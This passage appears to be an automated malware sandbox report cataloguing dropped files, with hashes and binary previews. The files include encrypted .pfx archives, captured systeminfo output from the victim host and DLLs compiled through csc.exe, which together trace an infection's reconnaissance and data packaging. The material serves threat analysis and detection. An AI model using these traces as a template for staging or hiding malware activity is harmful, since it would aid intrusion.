Preview:	PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1196
Entropy (8bit):	5.333915035046385
Encrypted:	false
SSDEEP:	24:3aZPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJF9G:qZPerB4nqRL/HvFe9t4Cv94anG
MD5:	B15D7C50C640BEF4A1E823CE568A5E5E
SHA1:	E456E2EE754F8FBA38F8F75858491258896C9E41
SHA-256:	A95974F134C10C31BF7B1243C3E5F3987F1CC878565E28182DEC577D552450C0
SHA-512:	B7E7D0303E3DCF81217B7AC871AF1C4871D8BA19CC595DB35A6640108411126666D244D8CF91D766E129E7306FBCBA9622746DF74EC030E180CFDEDB78239107
Malicious:	false
Reputation:	unknown
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\7C7B.bin\AuthRoot.pfx

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	23186
Entropy (8bit):	7.991041231447328
Encrypted:	true
SSDEEP:	384:ggOhdqMgQhhzLVz83kuWP5gzpr62Lr6T7YHVnn5UGY3QnG33Ov++pz2MAA1:g7uMFDR83BW5t2Pw7Yn6G+QnG33OvD+Q
MD5:	7B8BB9BA943395C3D6130174C4732F46
SHA1:	2A1B26AEC73001E44B98A8FC5F66DB7238CA0459
SHA-256:	03C5A6DCC0449B3AADEA6C0BB05747258B89BD40989DA04292A093174587D145
SHA-512:	12F9A12559F0422A29853FDC1416DFCC2DEEE1E2F4812DEC7DA05FA5996A3E557413B23E43ED3EBB514A30E489217D0505D86B627048C929806DDDDCEA0B8E8E
Malicious:	false
Reputation:	unknown
Preview:	0.Z....0.ZJ...H........Z;..Z70.Z30.Z/...H........Z 0.Z....0.Z....H......0....H.......0...0...&.4......Y.......%....t....c..^.@J..8.V.d...."...O.D....kmb?..A_.....y..zm...C......r...t..K..N4Or.?]..f..u......R...9.+.6......e...T.2.......hb.6..!.. ..S.Z%.i..b<Qq.S.^..`q.zB.tpM\.N.-.Sj.....g....Z@S.7...<2.f...%-...k.F.. ..n/..........3...]....AJ.........8&..J`....M..`..'>...q[%.S......g6...\|...b253.u..J...he..i...`......]....j....&.<...p.g0+..T..O..o[....i......)l..Mj\..z..."]8......../....+l..@.3#....2...[..)./.W.....p..%.oG...}..j...[>cd:<.....\....4.......D?D...a.....x..m.......!.,..sN...<D...$F..FT.............c..o.-..h]r;..>C..!?..b.....0...6.qN.#..R.(T.2.8...\.E3.g...%I...CV<.A..2...@.)...w(.e$Q.(..{x....aZ....H.'R%......W.k..P...K.......'J.Ph.....).....D&...Le..,61...j.1..hf..6.!d.G...H'..).O.B.......@4.V/C.....M..p.m`.&._........[...OL......+C...OY.P...E..7y...@......4..(=.=.a.e..7T...Y.<..jf...*^...^......U.....}.n...."1..

C:\Users\user\AppData\Local\Temp\7C7B.bin\Root.pfx

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	35938
Entropy (8bit):	7.994766403336213
Encrypted:	true
SSDEEP:	768:Uo9Rx7xPqGyIiVDpZcF2P++y96cih96w9KUDBUNTwDc:U4vRyIiKF2PaC9pKgc
MD5:	E6454209B0DBAD79DD2219F2BE137C33
SHA1:	9710D1CBB96DAFD14BC13E703404FDC9AC4EA7A9
SHA-256:	5DC604E8667BF29DFA0F2734C5E726222E1D75F553D719ED00A40BCF3BBABBB1
SHA-512:	1A8A810673C4BF63AB067DD393AB56BFF02EE4902A12E38A52E0818683D0C413A31EBB49B7896E09E2071D1B66BB33D70D61AB3D5C49C72C10ED5080B8207FAB
Malicious:	false
Reputation:	unknown
Preview:	0..^...0......H..............0...0......H..........0......0......H......0....H.......0...5iZIl.(.............b....oJ)......y.....`..GfN.h.,_Af.:..'Cj.O ....>...i.i.x...D\....y........n....Q..h.@S..V..0fP.:-<.A..`I...E.G....x0+.s.?.J..Llb...FH....`Cmak`.....2..bB.........$.I-.x.........l...._.S.nW)...a.Y...s.5.EU.;..U....X`]1~.%.5......9....n..t..(hBl..zm.HH.A.Vvj.)Y/..\.F.F.@,..{...nGG..o.A...]......Q/..#.kXG.e.g......&..G...>... .F..Mak.JO5-Lc9........K......Jj^j..B.~..}.@+~N..zl.....-..m@.]..."4'....Y4%.HX."k..>j`...(.Z.B....e.\n...R>......Z...%$K..?).<..zIt.fkUG...J...fF.3../>....l.m.X...g\|K.t.oMd..uk.0...........B.`.o.Y.\|yW8...K...b.L.....o.i......<}.^.....5AH...C.......@...'......k.!.Q.R...O.CV...;....b..em...<...z..q.....F.....k..C.~.c8..]2.>.....Zn..H.lb....{..y...j..[.......K.+.^rP>.,.%..w..L6Eo....j..'8]5.x.<..{.........s.......xZ........v..X .0,.x.l....E../....o.Q5,Y\|/..h....vn.m...).(...fKX.\|..J-..y......o..H].S.o.I.../

C:\Users\user\AppData\Local\Temp\9AF9.bin1

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	51361
Entropy (8bit):	4.028932530672399
Encrypted:	false
SSDEEP:	1536:sN9o5SEZZqpzteV2tTFGCTY9gOT7N2Vm2BKH9AM2KkbcM4txsEpucqRODKgCQ+FF:sXVB9Q4
MD5:	645D3031D145462946205BF1816CF775
SHA1:	E632126C947282571E610F7F085A7BA6B94AFD83
SHA-256:	A0940F2F95730625759933A5C8D872655BD805229F42BB9497A9F09359E2A73B
SHA-512:	2A1DB7AD892A766854550D54F0A04258C1780048050E122B47B8033A2F33AB08790B20B3982C3AADF931E0288DDD959467FE0D6D332438CE24D6F5AC44A3040F
Malicious:	false
Reputation:	unknown
Preview:	..Host Name: computer..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.17134 N/A Build 17134..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: pratesh..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 6/27/2019, 4:49:21 PM..System Boot Time: 8/6/2022, 3:39:30 PM..System Manufacturer: P6WmNR3TnU9PMR7..System Model: fEhWFAHT..System Type: x64-based PC..Processor(s): 1 Processor(s) Installed... [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz..BIOS Version: 37431 YCB22, 6/25/2021..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume2..System Locale:

C:\Users\user\AppData\Local\Temp\9F2A.bin

Download File

Process:	C:\Windows\explorer.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	59353
Entropy (8bit):	7.995568822525134
Encrypted:	true
SSDEEP:	1536:97HFq3BWP2PwY/nGHOLL4vRyIiKF2PaC9pK9U:zqRWuoY/nHUp2bgq
MD5:	6357C3EEA8C8B15C9A1EE1367511CF6A
SHA1:	FB17AE6B2E3DF9223D6905B27B9F2E512F92A400
SHA-256:	2761604BBA63DCE47B932B28048D75DEBB7396B7FAAA9260176A806B13DB49EA
SHA-512:	64A305AE4DB5D26F1ECFC57DBE6E221EE60D71DA3C9BBF75A52E65A376F0D95203C44509E229FD1038A40522FC9A130E533D5AF7967C84BE4866DE1B3A0036FA
Malicious:	false
Reputation:	unknown
Preview:	PK............MOA..Z...Z......AuthRoot.pfx..Zm.0.Z....0.ZJ...H........Z;..Z70.Z30.Z/...H........Z 0.Z....0.Z....H......0....H.......0...0...&.4......Y.......%....t....c..^.@J..*8.V.d...."...O.D....kmb?..A_.....y..zm...C......r...t..K..N4Or.?]..f..u......R...9.+.6......e...T.2.......hb.6..!.. ..S.Z%.i..b<Qq.S.^..`q.zB.tpM\.N.-.Sj.....g....Z@S.7...<2.f...%-...k.F.. ..n/..........3...]....AJ.........8&..J`....M..`..'>...q[%.S......g6...\|...b253.u..J...he..i...`......]....j....&.<...p.g0+..T..O..o[....i......)l..Mj\..z..."]8......../....+l..@.3#....2...[..)./.W.....p..%.oG...}..j...[>cd:<.....\....4.......D?D...a.....x..m.......!.,..sN...<D...$F..FT.............c..o.-..h]r;..>C..!?..b.....0...6.qN.#..R.(T.2.8...\.E3.g...%I...CV<.A..2...@.)...w(.e$Q.(..{x....aZ....H.'R%......W.k..P...K.......'J.Ph.....).....D&...Le..,61...j.1..hf..6.!d.G...H'..).O.B.......@4.V/C.....M..p.m`.&._........[...OL......+C...OY.P...E..7y...@......4..(=.=.a.e..7T

C:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1056479064968565
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryE8ak7Ynqq1RPN5Dlq5J:+RI+ycuZhNtakS7PNnqX
MD5:	FB161B42FD0D3B703F12B95057877CA4
SHA1:	489BEC19D578A871CDC88B83751A6B16715CE9B4
SHA-256:	C4879FCE577085F0D497BC3BCD1EEDFAE9BE8D29758E47DE75EFA129FD3112A7
SHA-512:	8F1A32DD855C52210F99456FFAC8CCCBCD6A8F8C33AA463AFF5B97A75992CD3CF7D285495CD7D5259C323A21ECC7E79567E12A19939C27D76E7A7BA54DFBB6C4
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.y.r.5.j.f.x.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.y.r.5.j.f.x.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1080474271990184
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryLNTYak7YnqqmNTNPN5Dlq5J:+RI+ycuZhN5pYakSmpNPNnqX
MD5:	0E91ECA701345D22466D0EA4428A3EB8
SHA1:	0B1326B4EB0685BA013862319736A82ED52214C3
SHA-256:	FB4DDD90E5704E1527189C3BA5F885DB146D5BD345280B0851DF22A8613D50C5
SHA-512:	4479F463617B26731BDF977C71988C5E62F71AD46F4A8E9B33B0632BA80693B845B4043FB343F403A320D6618571B7EE499768E675DFAF87A92FBDCFCC6C6400
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.i.h.j.3.z.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.i.h.j.3.z.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1052394426855807
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEIak7Ynqq9dPN5Dlq5J:+RI+ycuZhNBakSvPNnqX
MD5:	F61ACBD222CA9E142FFBA13FD827898D
SHA1:	854A50C38E7D202D2CFA794768276819FC745538
SHA-256:	4F79AB9A5B95B451BA6538E2E49D9854562A63CC9934D521AF07967A2CB065E0
SHA-512:	8ABF5B4E273975471CCE5A91CE17033949C2C196092ED7856CC250E9BFB84EDBD4ED9008F07353B8291C404137C025E7D63F0805EC3DFBB8268646B9F6DC9A0F
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.u.p.j.0.y.h.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.u.p.j.0.y.h.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1160323863458923
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry6iak7Ynqq3jPN5Dlq5J:+RI+ycuZhNciakS3jPNnqX
MD5:	7250F80F25A40F7947457212CDAC37CB
SHA1:	F9FD2CB47BA5443050B682FDF3E157126A5B4B5A
SHA-256:	DDA52729236A02DA2BB9DF07593BD0F1C1862AA4BF499B85952A75A4562B65FC
SHA-512:	AC05CFCBE1CB2856F9A019BFDDA5BB98C065C7B42FBF33C3E4BB0EDFF3B0F83625F489CFFB967A832227E0A57A3B102D6052336C43D59871A39877F21B90FE0B
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.x.p.j.p.f.g.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.x.p.j.p.f.g.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES501C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Tue Oct 11 13:05:19 2022, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.985512109709175
Encrypted:	false
SSDEEP:	24:HugnW9NfMlXDfHAhKdNWI+ycuZhNBakSvPNnq9hgd:boMlzCKd41ulBa3tq9y
MD5:	E6495FDCD4030F492CBA20B3C51591EF
SHA1:	2D9044E00AAC14E6318C0DF558DADA012586B8CE
SHA-256:	798FE5176580696CC341901CBF76CD93EF6D320B84E96AD02A87370D675C5141
SHA-512:	C0D30967D7DDF2DCB712ACE2CF102EB4F8847C1421C2C9426FB0B5C902E7F405C89C2B82D39DFDC596D24C2E62A9BFB149653C81B43264843C928D3E3CCD962E
Malicious:	false
Reputation:	unknown
Preview:	L....jEc.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP...................."../..?.'............4.......C:\Users\user\AppData\Local\Temp\RES501C.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.u.p.j.0.y.h.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\RESA4F5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Tue Oct 11 13:02:17 2022, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.9804591091508197
Encrypted:	false
SSDEEP:	24:H7inW9Nf+3DfHZhKdNWI+ycuZhNtakS7PNnq9hgd:bEoQHKd41ulta3xq9y
MD5:	8FA4C6D7DAE78BB8A494CCCBAC1546AA
SHA1:	5ED5A92375463FCEDCF061D398A46B1DC0D2E2D3
SHA-256:	317E36EEA023691F12D8569D03906161E6D27F983582A25D19663526E15E74EE
SHA-512:	A0BF56CF8D7AC8282865A92BB078BF87969350835E084FB35102FA024840AD83A2F8B576D4ACE700B0115428B171EBA561B2B8401AFD7A72A813603C48C02273
Malicious:	false
Reputation:	unknown
Preview:	L...YiEc.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP...................B..;p?..PW.\|...........4.......C:\Users\user\AppData\Local\Temp\RESA4F5.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.y.r.5.j.f.x.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\RESB08E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Tue Oct 11 13:02:20 2022, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.9528013256881853
Encrypted:	false
SSDEEP:	24:HwinW9QhfNSrIDfHQhKdNWI+ycuZhNciakS3jPNnq9hgd:QE5ZICSKd41ulcia33Jq9y
MD5:	57F8508B9E03657DA7C5A87EEA18BAAA
SHA1:	71F9E682768BC760A4B8A0E52EE6506626EF68A7
SHA-256:	26EF77313E0E1C50CC2E15F74FFF4974D53569CB6059F09FF8E2D0401F9E0FA6
SHA-512:	447D871DD245FAFE830E5529F2E862BA60A8A68579CE335778350B4749F9C9DD7F1C8FE88FE75A8DB6FFDCA5D77E7E4AEBDD464A80131C71EF79655B20FDD4AF
Malicious:	false
Reputation:	unknown
Preview:	L...\iEc.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........J....c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP.................rP..%..yGEr..7...........4.......C:\Users\user\AppData\Local\Temp\RESB08E.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.x.p.j.p.f.g.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\RESFA7A.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Tue Oct 11 13:04:57 2022, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.96588848592824
Encrypted:	false
SSDEEP:	24:HbinW9Nf5iDfHkhKdNWI+ycuZhN5pYakSmpNPNnq9hgd:7Eo5YWKd41ul5ia3mJq9y
MD5:	365B2DDE68DD5DB77B55D895F51C2174
SHA1:	03072AA9C3ABD407B126A6482E0877C9D8479B75
SHA-256:	D5F9C718799ABB0296D27C06B42E0BE654CC8B5933E0CF579884927182784AD1
SHA-512:	21ED8EBC7469938A6F9577D8C778330079287CC439D5329A843A9F9DAE569346E988C3ABD9C699FD866335DBF35F159DC145AC33E86A5149B1D3546953EE173F
Malicious:	false
Reputation:	unknown
Preview:	L....iEc.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP....................4]"Fm..B.>...........4.......C:\Users\user\AppData\Local\Temp\RESFA7A.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.i.h.j.3.z.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akfsyqoz.ont.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0v3avdz.ytr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pigzubgt.i2t.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yf122sov.tys.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\iyr5jfx4.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	410
Entropy (8bit):	4.963679469380117
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJ7PMRSR7a1e3amPZERG9cQJSSRa+rVSSRnA/fzTmOoqy:V/DTLDfupnh3NP62v9rV5nA/+OFy
MD5:	9A10482ACB9E6952B96F4EFC24D9D783
SHA1:	5CFC9BF668351DF25FCDA98C3C2D0BB056C026C3
SHA-256:	A0424E1530F002761A882C19C22504153A5E86D7FBB41391E940452BFA15F377
SHA-512:	E932914AD99D7BD39561E020D1E8C1F4E175C16EAE66DF720100C65E40CCC3383B5145F703432885F3F1CE080E8A4FEB045DDD5C8BBC2F3231C619D04182AC28
Malicious:	false
Reputation:	unknown
